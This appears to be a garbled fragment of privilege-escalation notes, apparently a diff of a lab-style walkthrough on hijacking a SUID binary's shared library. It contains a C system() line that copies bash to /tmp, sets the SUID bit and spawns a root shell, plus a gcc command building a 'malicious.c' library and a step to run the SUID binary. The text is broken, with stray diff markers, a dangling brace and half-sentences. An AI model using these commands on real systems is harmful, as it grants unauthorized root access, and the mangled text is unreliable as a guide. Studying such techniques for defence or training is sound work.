or

 system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");

-we create a file and we start to convert this file to library
+}we create a file and we start to convert this file to library

-gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/malicious.c
+gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/malicious.c then run the main file suid-so

 usr/local/bin/suid-so